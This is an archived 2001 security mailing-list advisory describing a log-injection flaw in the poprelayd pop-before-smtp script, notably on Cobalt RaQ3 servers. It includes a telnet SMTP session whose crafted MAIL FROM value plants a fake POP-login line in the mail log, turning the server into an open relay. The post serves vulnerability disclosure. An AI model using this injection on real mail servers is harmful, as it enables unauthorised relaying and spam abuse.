Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Andrea Barisani (lcarsinfis.univ.trieste.it)
Date: Tue Jul 03 2001 - 12:05:10 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi to all,

    Poprelayd is a simple script that scan /var/log/maillog for valid pop
    logins and updates a hash db used by sendmail to permit relaying for
    those valid pop users, this method is called "Pop-before-smtp".

    The syslog string searched by the script is in this form for the qpop
    /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9]\.]+)/)

    On some cobalt raq3 servers (with the poprelayd add-on packet installed )
    and in general on any system running the poprelayd script with sendmail is
    possible to "inject" this string in the syslog using sendmail logging. So
    anyone can insert a fake string with his own IP wich will be parsed by
    poprelayd and that will permit the use of sendmail as a relay.

    On cobalts the presence of poprelayd is revealed by the modified sendmail
    relaying denied message "Relaying denied. Please check your mail first."


    telnet dumbcobalt 25
    Connected to dumbcobalt
    ehlo dumbcobalt
    mail from:"POP login by user "admin" at (
    553 "POP login by user "admin" at (
    linux.org"...Domain name required

    now the IP can do relay :)

    in fact, on dumbcobalt:

    in /var/log/maillog

    ...reject=533 "POP login by user "admin" at (
    linux.org", size=0, class=0 ....etc etc...

    [rootdumbcobalt /]# /usr/sbin/poprelayd -p 7



    INFIS Network Administrator & Security Officer
    Department of Physics - University of Trieste
    lcarsinfis.univ.trieste.it - PGP Key 0x8E21FE82
    "How would you know I'm mad?" said Alice.
    "You must be,'said the Cat,'or you wouldn't have come here."